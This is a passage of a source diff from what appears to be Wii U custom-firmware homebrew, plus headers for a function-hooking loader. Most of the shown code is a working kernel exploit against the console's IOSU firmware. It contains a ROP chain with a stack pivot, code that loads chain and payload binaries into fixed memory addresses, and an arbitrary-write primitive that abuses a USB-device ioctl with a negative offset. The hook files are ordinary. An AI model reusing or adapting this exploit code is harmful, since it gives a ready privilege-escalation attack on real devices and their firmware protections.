0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x0,
0x0,
0x0,
0x00110000 - 0x44, // 0x8C
0x00110010, // 0x90
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0,
0x0,
0x1012EA68, // 0xAC stack pivot
};
static void uhs_exploit_init(int dev_uhs_0_handle, cfw_config_t * config)
{
ayylmao[5] = 1;
ayylmao[8] = 0x500000;
memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
memcpy((char*)(0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin));
payload_info_t *payloads = (payload_info_t*)0xF4148000;
payloads->size = sizeof(cfw_config_t);
memcpy(payloads->data, config, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
payloads->size = sizeof(ios_usb_bin);
memcpy(payloads->data, ios_usb_bin, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
payloads->size = sizeof(ios_fs_bin);
memcpy(payloads->data, ios_fs_bin, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
payloads->size = sizeof(ios_bsp_bin);
memcpy(payloads->data, ios_bsp_bin, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
payloads->size = sizeof(ios_acp_bin);
memcpy(payloads->data, ios_acp_bin, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
payloads->size = sizeof(ios_mcp_bin);
memcpy(payloads->data, ios_mcp_bin, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
/*if(config->launchImage){
FILE *pFile = fopen(APP_PATH "/launch_image.tga", "rb");
if(pFile)
{
fseek(pFile, 0, SEEK_END);
payloads->size = ftell(pFile);
fseek(pFile, 0, SEEK_SET);
fread(payloads->data, 1, payloads->size, pFile);
fclose(pFile);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
}
else
{
payloads->size = launch_image_tga_size;
memcpy(payloads->data, launch_image_tga, payloads->size);
payloads = (payload_info_t*)( ((char*)payloads) + ALIGN4(sizeof(payload_info_t) + payloads->size) );
}
}*/
pretend_root_hub[33] = 0x500000;
pretend_root_hub[78] = 0;
DCStoreRange(pretend_root_hub + 33, 200);
DCStoreRange((void*)0xF4120000, sizeof(second_chain));
DCStoreRange((void*)0xF4130000, sizeof(final_chain));
DCStoreRange((void*)0xF4140000, sizeof(ios_kernel_bin));
DCStoreRange((void*)0xF4148000, ((u32)payloads) - 0xF4148000);
}
static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val)
{
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress)
OSSleepTicks(0x200000); //! Improves stability
int request_buffer[] = { -(0xBEA2C), val }; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}
int ExecuteIOSExploit(cfw_config_t * config){
DEBUG_FUNCTION_LINE("Running ExecuteIOSExploit\n");
int iosuhaxFd = IOS_Open("/dev/iosuhax", 0);
if(iosuhaxFd >= 0){
int dummy = 0;
IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
//! do not run patches again as that will most likely crash
//! because the wupserver and the iosuhax dev node are still running
//! just relaunch IOS with new configuration
IOS_Close(iosuhaxFd);
}
//! execute exploit
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);
if(dev_uhs_0_handle < 0){
DEBUG_FUNCTION_LINE("Failed to open \"/dev/uhs/0\"\n");
return dev_uhs_0_handle;
}
uhs_exploit_init(dev_uhs_0_handle, config);
uhs_write32(dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
uhs_write32(dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C);
uhs_write32(dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE);
uhs_write32(dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC}
IOS_Close(dev_uhs_0_handle);
DEBUG_FUNCTION_LINE("Function end\n");
return 0;
}
void ExecuteIOSExploitWithDefaultConfig(){
cfw_config_t config;
config.viewMode = 0;
config.directLaunch = 0;
config.launchImage = 0;
config.noIosReload = 1;
config.launchSysMenu = 0;
config.redNAND = 0;
config.seeprom_red = 0;
config.otp_red = 0;
config.syshaxXml = 0;
ExecuteIOSExploit(&config);
}

View File

@ -0,0 +1,16 @@
#ifndef __MOCHA_HOOK_H_
#define __MOCHA_HOOK_H_
#include "../mocha/src/cfw_config.h"
#ifdef __cplusplus
extern "C" {
#endif
void ExecuteIOSExploitWithDefaultConfig();
#ifdef __cplusplus
}
#endif
#endif // __MOCHA_HOOK_H_

View File

@ -16,8 +16,8 @@
* along with this program. If not, see <http://www.gnu.org/licenses/>. * along with this program. If not, see <http://www.gnu.org/licenses/>.
****************************************************************************/ ****************************************************************************/
#ifndef _FUNCTION_HOOKS_H_ #ifndef _FUNCTION_PATCHER_HOOKS_H_
#define _FUNCTION_HOOKS_H_ #define _FUNCTION_PATCHER_HOOKS_H_
#ifdef __cplusplus #ifdef __cplusplus
extern "C" { extern "C" {
@ -88,12 +88,8 @@ u32 new_GetAddressOfFunction(const char * functionName,wups_loader_library_type_
s32 new_isDynamicFunction(u32 physicalAddress); s32 new_isDynamicFunction(u32 physicalAddress);
void new_resetLibs(); void new_resetLibs();
//Orignal code by Chadderz.
#define MAKE_MAGIC(x, lib,functionType) { (u32) my_ ## x, (u32) &real_ ## x, lib, # x,0,0,functionType,0}
#define MAKE_MAGIC_NAME(x,y, lib,functionType) { (u32) my_ ## x, (u32) &real_ ## x, lib, # y,0,0,functionType,0}
#ifdef __cplusplus #ifdef __cplusplus
} }
#endif #endif
#endif /* _FS_H */ #endif /* _FUNCTION_PATCHER_HOOKS_H_ */

View File

@ -0,0 +1,34 @@
#include <utils/logger.h>
#include <utils/function_patcher.h>
#include "common/retain_vars.h"
#include "hooks_patcher.h"
#include "main.h"
DECL(void, __PPCExit, void){
DEBUG_FUNCTION_LINE("__PPCExit\n");
DeInit();
real___PPCExit();
}
DECL(u32, ProcUIProcessMessages, u32 u){
u32 res = real_ProcUIProcessMessages(u);
if(res != gAppStatus){
DEBUG_FUNCTION_LINE("App status changed from %d to %d \n",gAppStatus,res);
gAppStatus = res;
}
return res;
}
hooks_magic_t method_hooks_hooks[] __attribute__((section(".data"))) = {
MAKE_MAGIC(__PPCExit, LIB_CORE_INIT, STATIC_FUNCTION),
MAKE_MAGIC(ProcUIProcessMessages, LIB_PROC_UI, DYNAMIC_FUNCTION),
};
u32 method_hooks_size_hooks __attribute__((section(".data"))) = sizeof(method_hooks_hooks) / sizeof(hooks_magic_t);
//! buffer to store our instructions needed for our replacements
volatile u32 method_calls_hooks[sizeof(method_hooks_hooks) / sizeof(hooks_magic_t) * FUNCTION_PATCHER_METHOD_STORE_SIZE] __attribute__((section(".data")));

View File

@ -0,0 +1,18 @@
#ifndef _HOOKS_FUNCTION_PATCHER_H
#define _HOOKS_FUNCTION_PATCHER_H
#include <utils/function_patcher.h>
#ifdef __cplusplus
extern "C" {
#endif
extern hooks_magic_t method_hooks_hooks[];
extern u32 method_hooks_size_hooks;
extern volatile u32 method_calls_hooks[];
#ifdef __cplusplus
}
#endif
#endif /* _HOOKS_FUNCTION_PATCHER_H */